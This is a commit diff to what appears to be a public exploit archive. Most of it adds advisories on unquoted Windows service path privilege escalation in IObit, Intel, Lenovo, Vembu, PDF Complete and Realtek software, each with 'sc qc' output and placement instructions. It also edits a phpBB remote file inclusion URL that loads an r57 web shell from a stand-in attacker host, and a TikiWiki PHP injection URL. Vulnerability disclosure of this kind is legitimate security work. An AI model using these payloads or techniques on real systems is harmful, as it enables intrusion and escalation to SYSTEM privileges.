-includes/archive/archive_topic.php?phpbb_root_path=http://meto5757.by.ru/shells/r57.txt?
+includes/archive/archive_topic.php?phpbb_root_path=http://attacker/shells/r57.txt?
 
 ------------------------
 

platforms/php/webapps/4509.txt

@@ -1,5 +1,5 @@
 TikiWiki 1.9.8 Remote PHP Injection Vulnerability
 
-Example: http://www.example.com/tikiwiki/tiki-graph_formula.php?w=1&h=1&s=1&min=1&max=2&f[]=x.tan.phpinfo()&t=png&title=
+Example: http:/server/tikiwiki/tiki-graph_formula.php?w=1&h=1&s=1&min=1&max=2&f[]=x.tan.phpinfo()&t=png&title=
 
 # milw0rm.com [2007-10-10]

platforms/windows/dos/40536.py

@@ -1,7 +1,5 @@
-
-
 '''
-#Hi guys
+
 #Title: Firefox 49.0.1 crash Denial of Service
 #Date: 15 Oct 2016
 #Author: sultan albalawi
@@ -10,7 +8,7 @@
 #Open link in firefox
 #Double click on the Click You will see the report that there are crach
 
-#thanks
+
 .........................................................................
 '''
 

platforms/windows/local/40528.txt

@@ -3,9 +3,8 @@
 # Date: 13/10/2016
 # Author: Amir.ght
 # Vendor Homepage: https://www.hotspotshield.com
-# Software Link:
+# Software Link: https://www.hotspotshield.com/download/
-https://www.hotspotshield.com/download/
+# version : 6.0.3  (Latest)
-#version : 6.0.3  (Latest)
 # Tested on: Windows 7
 ##########################################################################
 

platforms/windows/local/40539.txt

@@ -1,12 +1,10 @@
 #########################################################################
-# Exploit Title: NETGATE Registry Cleaner Unquoted Service Path
+# Exploit Title: NETGATE Registry Cleaner Unquoted Service Path Privilege Escalation
-Privilege Escalation
 # Date: 15/10/2016
 # Author: Amir.ght
 # Vendor Homepage: http://www.netgate.sk/
-# Software Link:
+# Software Link: http://www.netgate.sk/download/download.php?id=4
-http://www.netgate.sk/download/download.php?id=4
+# Version : build 16.0.205  (Latest)
-#version : build 16.0.205  (Latest)
 # Tested on: Windows 7
 ##########################################################################
 

platforms/windows/local/40540.txt

@@ -1,12 +1,10 @@
 #########################################################################
-# Exploit Title: NETGATE AMITI Antivirus Unquoted Service Path
+# Exploit Title: NETGATE AMITI Antivirus Unquoted Service Path Privilege Escalation
-Privilege Escalation
 # Date: 15/10/2016
 # Author: Amir.ght
 # Vendor Homepage: http://www.netgate.sk/
-# Software Link:
+# Software Link: http://www.netgate.sk/download/download.php?id=11
-http://www.netgate.sk/download/download.php?id=11
+# Version : build 23.0.305  (Latest)
-#version : build 23.0.305  (Latest)
 # Tested on: Windows 7
 ##########################################################################
 

platforms/windows/local/40577.txt

@@ -0,0 +1,33 @@
+#########################################################################
+# Exploit Title: IObit Advanced SystemCare Unquoted Service Path Privilege Escalation
+# Date: 19/10/2016
+# Author: Ashiyane Digital Security Team
+# Vendor Homepage: http://www.iobit.com/en/index.php
+# Software Link: http://www.iobit.com/en/advancedsystemcarefree.php#
+# version : 10.0.2  (Latest)
+# Tested on: Windows 7
+##########################################################################
+
+IObit Advanced SystemCare installs a service with an unquoted service path
+To properly exploit this vulnerability, the local attacker must insert
+an executable file in the path of the service.
+Upon service restart or system reboot, the malicious code will be run
+with elevated privileges.
+-------------------------------------------
+C:\>sc qc AdvancedSystemCareService10
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: AdvancedSystemCareService10
+        TYPE               : 10  WIN32_OWN_PROCESS
+        START_TYPE         : 2   AUTO_START
+        ERROR_CONTROL      : 1   NORMAL
+        BINARY_PATH_NAME   : C:\Program Files\IObit\Advanced SystemCare\ASCService.exe
+        LOAD_ORDER_GROUP   : System Reserved
+        TAG                : 1
+        DISPLAY_NAME       : Advanced SystemCare Service 10
+        DEPENDENCIES       :
+        SERVICE_START_NAME : LocalSystem
+################################################
+######### Ashiyane Digital Security Team ############
+########## exploit by: Amir.ght #####################
+################################################

platforms/windows/local/40579.txt

@@ -0,0 +1,51 @@
+# Exploit Title: Intel(R) Management Engine Components - Unquoted Service Path Privilege Escalation
+# Date: 10/19/2016
+# Exploit Author: Joey Lane
+# Version: 8.0.1.1399
+# Tested on: Windows 7 Professional
+
+The Intel(R) Management and Security Application Local Management Service (LMS) is installed with an unquoted service path.  
+This enables a local privilege escalation vulnerability.  
+To exploit this vulnerability, a local attacker can insert an executable file in the path of the service.  
+Rebooting the system or restarting the service will run the malicious executable with elevated privileges.
+
+This was tested on version 8.0.1.1399, but other versions may be affected
+as well.
+
+
+---------------------------------------------------------------------------
+
+C:\>sc qc LMS
+
+[SC] QueryServiceConfig SUCCESS
+
+
+
+SERVICE_NAME: LMS
+
+        TYPE               : 10  WIN32_OWN_PROCESS
+
+        START_TYPE         : 2   AUTO_START  (DELAYED)
+
+        ERROR_CONTROL      : 1   NORMAL
+
+        BINARY_PATH_NAME   : C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
+
+        LOAD_ORDER_GROUP   :
+
+        TAG                : 0
+
+        DISPLAY_NAME       : Intel(R) Management and Security Application Local Management Service
+
+        DEPENDENCIES       :
+
+        SERVICE_START_NAME : LocalSystem
+
+---------------------------------------------------------------------------
+
+
+EXAMPLE:
+
+Using the BINARY_PATH_NAME listed above as an example, an executable named
+"Program.exe" could be placed in "C:\", and it would be executed as the
+Local System user next time the service was restarted.

platforms/windows/local/40580.txt

@@ -0,0 +1,39 @@
+# Exploit Title: Lenovo RapidBoot HDD Accelerator - Unquoted Service Path Privilege Escalation
+# Date: 10/19/2016
+# Exploit Author: Joey Lane
+# Version: 1.00.0802
+# Tested on: Windows 7 Professional
+ 
+The Lenovo RapidBoot HDD Accelerator service is installed with an unquoted service path.
+This enables a local privilege escalation vulnerability.  
+To exploit this vulnerability, a local attacker can insert an executable file in the path of the service.  
+Rebooting the system or restarting the service will run the malicious executable with elevated privileges.
+
+This was tested on version 1.00.0802, but other versions may be affected as well.
+ 
+ 
+---------------------------------------------------------------------------
+ 
+C:\>sc qc FastbootService                                                       
+[SC] QueryServiceConfig SUCCESS                                                 
+                                                                                
+SERVICE_NAME: FastbootService                                                   
+        TYPE               : 10  WIN32_OWN_PROCESS                              
+        START_TYPE         : 2   AUTO_START                                     
+        ERROR_CONTROL      : 1   NORMAL                                         
+        BINARY_PATH_NAME   : C:\Program Files (x86)\Lenovo\RapidBoot HDD Accelerator\FBService.exe                                                              
+        LOAD_ORDER_GROUP   :                                                    
+        TAG                : 0                                                  
+        DISPLAY_NAME       : FastbootService                                    
+        DEPENDENCIES       : RPCSS                                              
+        SERVICE_START_NAME : LocalSystem
+ 
+---------------------------------------------------------------------------
+ 
+ 
+EXAMPLE:
+ 
+Using the BINARY_PATH_NAME listed above as an example, an executable named
+"Program.exe" could be placed in "C:\", and it would be executed as the
+Local System user next time the service was restarted.
+

platforms/windows/local/40581.txt

@@ -0,0 +1,50 @@
+# Exploit Title: Lenovo Slim USB Keyboard - Unquoted Service Path Privilege Escalation
+# Date: 10/19/2016
+# Exploit Author: Joey Lane
+# Version: 1.09
+# Tested on: Windows 7 Professional
+
+The Lenovo Slim USB Keyboard service is installed with an unquoted service path.
+This enables a local privilege escalation vulnerability.  
+To exploit this vulnerability, a local attacker can insert an executable file in the path of the service.
+Rebooting the system or restarting the service will run the malicious executable with elevated privileges.
+
+This was tested on version 1.09, but other versions may be affected as well.
+
+
+---------------------------------------------------------------------------
+
+C:\>sc qc Sks8821
+
+[SC] QueryServiceConfig SUCCESS
+
+
+
+SERVICE_NAME: Sks8821
+
+        TYPE               : 20  WIN32_SHARE_PROCESS
+
+        START_TYPE         : 2   AUTO_START
+
+        ERROR_CONTROL      : 1   NORMAL
+
+        BINARY_PATH_NAME   : C:\Program Files\Lenovo\Lenovo Slim USB Keyboard\Sks8821.exe
+
+        LOAD_ORDER_GROUP   :
+
+        TAG                : 0
+
+        DISPLAY_NAME       : Skdaemon Service
+
+        DEPENDENCIES       :
+
+        SERVICE_START_NAME : LocalSystem
+
+---------------------------------------------------------------------------
+
+
+EXAMPLE:
+
+Using the BINARY_PATH_NAME listed above as an example, an executable named
+"Program.exe" could be placed in "C:\", and it would be executed as the
+Local System user next time the service was restarted.

platforms/windows/local/40582.txt

@@ -0,0 +1,78 @@
+# Exploit Title: Vembu StoreGrid - Unquoted Service Path Privilege Escalation
+# Date: 10/19/2016
+# Exploit Author: Joey Lane
+# Version: 4.0
+# Tested on: Windows Server 2012
+
+StoreGrid is a re-brandable backup solution, which can install 2 services with unquoted service paths.
+This enables a local privilege escalation vulnerability.  
+To exploit this vulnerability, a local attacker can insert an executable file in the path of either service.
+Rebooting the system or restarting the service will run the malicious executable with elevated privileges.
+
+This was tested on version 4.0, but other versions may be affected as well.
+
+
+---------------------------------------------------------------------------
+
+C:\>sc qc RemoteBackup
+
+[SC] QueryServiceConfig SUCCESS
+
+
+
+SERVICE_NAME: RemoteBackup
+
+        TYPE               : 10  WIN32_OWN_PROCESS
+
+        START_TYPE         : 2   AUTO_START
+
+        ERROR_CONTROL      : 0   IGNORE
+
+        BINARY_PATH_NAME   : C:\Program Files\MSP\RemoteBackup\bin\StoreGrid.exe
+
+
+        LOAD_ORDER_GROUP   :
+
+        TAG                : 0
+
+        DISPLAY_NAME       : RemoteBackup
+
+        DEPENDENCIES       :
+
+        SERVICE_START_NAME : LocalSystem
+
+
+C:\>sc qc RemoteBackup_webServer
+
+[SC] QueryServiceConfig SUCCESS
+
+
+
+SERVICE_NAME: RemoteBackup_webServer
+
+        TYPE               : 10  WIN32_OWN_PROCESS
+
+        START_TYPE         : 2   AUTO_START
+
+        ERROR_CONTROL      : 0   IGNORE
+
+        BINARY_PATH_NAME   : C:\Program Files\MSP\RemoteBackup\apache\Apache.exe -k runservice
+
+        LOAD_ORDER_GROUP   :
+
+        TAG                : 0
+
+        DISPLAY_NAME       : RemoteBackup_WebServer
+
+        DEPENDENCIES       :
+
+        SERVICE_START_NAME : LocalSystem
+
+---------------------------------------------------------------------------
+
+
+EXAMPLE:
+
+Using the BINARY_PATH_NAME listed above as an example, an executable named
+"Program.exe" could be placed in "C:\", and it would be executed as the
+Local System user next time the service was restarted.

platforms/windows/local/40583.txt

@@ -0,0 +1,49 @@
+# Exploit Title: Intel(R) PROSet/Wireless for Bluetooth(R) + High Speed - Unquoted Service Path Privilege Escalation
+# Date: 10/19/2016
+# Exploit Author: Joey Lane
+# Version: 15.1.0.0096
+# Tested on: Windows 7 Professional
+
+The Intel(R) PROSet/Wireless for Bluetooth(R) + High Speed service is installed with an unquoted service path.  
+This enables a local privilege escalation vulnerability.
+To exploit this vulnerability, a local attacker can insert an executable file in the path of the service.  
+Rebooting the system or restarting the service will run the malicious executable with elevated privileges.
+This was tested on version 15.1.0.0096, but other versions may be affected as well.
+
+
+---------------------------------------------------------------------------
+
+C:\>sc qc AMPPALR3
+
+[SC] QueryServiceConfig SUCCESS
+
+
+
+SERVICE_NAME: AMPPALR3
+
+        TYPE               : 10  WIN32_OWN_PROCESS
+
+        START_TYPE         : 2   AUTO_START  (DELAYED)
+
+        ERROR_CONTROL      : 1   NORMAL
+
+        BINARY_PATH_NAME   : C:\Program Files\Intel\BluetoothHS\BTHSAmpPalService.exe
+
+        LOAD_ORDER_GROUP   :
+
+        TAG                : 0
+
+        DISPLAY_NAME       : Intelr Centrinor Wireless Bluetoothr + High Speed Service
+
+        DEPENDENCIES       :
+
+        SERVICE_START_NAME : LocalSystem
+
+---------------------------------------------------------------------------
+
+
+EXAMPLE:
+
+Using the BINARY_PATH_NAME listed above as an example, an executable named
+"Program.exe" could be placed in "C:\", and it would be executed as the
+Local System user next time the service was restarted.

platforms/windows/local/40585.txt

@@ -0,0 +1,55 @@
+# Exploit Title: Lenovo ThinkVantage Communications Utility - Unquoted Service Path Privilege Escalation
+# Date: 10/19/2016
+# Exploit Author: Joey Lane
+# Version: 3.0.42.0
+# Tested on: Windows 7 Professional
+ 
+The Lenovo ThinkVantage Communications Utility installs 2 services with unquoted
+service paths.  This enables a local privilege escalation vulnerability.
+To exploit this vulnerability, a local attacker can insert an executable file in the path
+of either service.  Rebooting the system or restarting either service will run the malicious
+executable with elevated privileges.
+ 
+ 
+This was tested on version 3.0.42.0, but other versions may be affected as well.
+ 
+ 
+---------------------------------------------------------------------------
+ 
+C:\>sc qc LENOVO.CAMMUTE                                                        
+[SC] QueryServiceConfig SUCCESS                                                 
+                                                                                
+SERVICE_NAME: LENOVO.CAMMUTE                                                    
+        TYPE               : 10  WIN32_OWN_PROCESS                              
+        START_TYPE         : 2   AUTO_START                                     
+        ERROR_CONTROL      : 0   IGNORE                                         
+        BINARY_PATH_NAME   : C:\Program Files\Lenovo\Communications Utility\CAMMUTE.exe                                                                         
+        LOAD_ORDER_GROUP   :                                                    
+        TAG                : 0                                                  
+        DISPLAY_NAME       : Lenovo Camera Mute                                 
+        DEPENDENCIES       :                                                    
+        SERVICE_START_NAME : LocalSystem
+
+
+C:\>sc qc LENOVO.TPKNRSVC                                                       
+[SC] QueryServiceConfig SUCCESS                                                 
+                                                                                
+SERVICE_NAME: LENOVO.TPKNRSVC                                                   
+        TYPE               : 10  WIN32_OWN_PROCESS                              
+        START_TYPE         : 2   AUTO_START                                     
+        ERROR_CONTROL      : 0   IGNORE                                         
+        BINARY_PATH_NAME   : C:\Program Files\Lenovo\Communications Utility\TPKNRSVC.exe                                                                        
+        LOAD_ORDER_GROUP   :                                                    
+        TAG                : 0                                                  
+        DISPLAY_NAME       : Lenovo Keyboard Noise Reduction                    
+        DEPENDENCIES       :                                                    
+        SERVICE_START_NAME : LocalSystem
+ 
+---------------------------------------------------------------------------
+ 
+ 
+EXAMPLE:
+ 
+Using the BINARY_PATH_NAME listed above as an example, an executable named
+"Program.exe" could be placed in "C:\", and it would be executed as the
+Local System user next time the service was restarted.

platforms/windows/local/40586.txt

@@ -0,0 +1,41 @@
+# Exploit Title: PDF Complete Corporate Edition - Unquoted Service Path Privilege Escalation
+# Date: 10/19/2016
+# Exploit Author: Joey Lane
+# Software Link: http://www.pdfcomplete.com/cms/Downloads.aspx
+# Version: 4.1.12
+# Tested on: Windows 7 Professional
+ 
+PDF Complete Corporate Edition installs a service with an unquoted service path.
+This enables a local privilege escalation vulnerability.  To exploit this vulnerability,
+a local attacker can insert an executable file in the path of the service.
+Rebooting the system or restarting the service will run the malicious executable
+with elevated privileges.
+ 
+ 
+This was tested on version 4.1.12, but other versions may be affected as well.
+ 
+ 
+---------------------------------------------------------------------------
+ 
+C:\>sc qc pdfcDispatcher                                                        
+[SC] QueryServiceConfig SUCCESS                                                 
+                                                                                
+SERVICE_NAME: pdfcDispatcher                                                    
+        TYPE               : 10  WIN32_OWN_PROCESS                              
+        START_TYPE         : 2   AUTO_START                                     
+        ERROR_CONTROL      : 1   NORMAL                                         
+        BINARY_PATH_NAME   : C:\Program Files (x86)\PDF Complete\pdfsvc.exe                                         
+        LOAD_ORDER_GROUP   :                                                    
+        TAG                : 0                                                  
+        DISPLAY_NAME       : PDF Document Manager                               
+        DEPENDENCIES       :                                                    
+        SERVICE_START_NAME : LocalSystem
+ 
+---------------------------------------------------------------------------
+ 
+ 
+EXAMPLE:
+ 
+Using the BINARY_PATH_NAME listed above as an example, an executable named
+"Program.exe" could be placed in "C:\", and it would be executed as the
+Local System user next time the service was restarted.

platforms/windows/local/40587.txt

@@ -0,0 +1,40 @@
+# Exploit Title: Realtek High Definition Audio Driver - Unquoted Service Path Privilege Escalation
+# Date: 10/19/2016
+# Exploit Author: Joey Lane
+# Version: 6.0.1.6730
+# Tested on: Windows 7 Professional
+ 
+The Realtek High Definition Audio Driver installs a service with an unquoted service path.
+This enables a local privilege escalation vulnerability.  To exploit this vulnerability,
+a local attacker can insert an executable file in the path of the service.
+Rebooting the system or restarting the service will run the malicious executable
+with elevated privileges.
+ 
+ 
+This was tested on version 6.0.1.6730, but other versions may be affected as well.
+ 
+ 
+---------------------------------------------------------------------------
+ 
+C:\>sc qc RtkAudioService                                                       
+[SC] QueryServiceConfig SUCCESS                                                 
+                                                                                
+SERVICE_NAME: RtkAudioService                                                   
+        TYPE               : 10  WIN32_OWN_PROCESS                              
+        START_TYPE         : 2   AUTO_START                                     
+        ERROR_CONTROL      : 1   NORMAL                                         
+        BINARY_PATH_NAME   : C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe                                                                           
+        LOAD_ORDER_GROUP   : PlugPlay                                           
+        TAG                : 0                                                  
+        DISPLAY_NAME       : Realtek Audio Service                              
+        DEPENDENCIES       :                                                    
+        SERVICE_START_NAME : LocalSystem
+ 
+---------------------------------------------------------------------------
+ 
+ 
+EXAMPLE:
+ 
+Using the BINARY_PATH_NAME listed above as an example, an executable named
+"Program.exe" could be placed in "C:\", and it would be executed as the
+Local System user next time the service was restarted.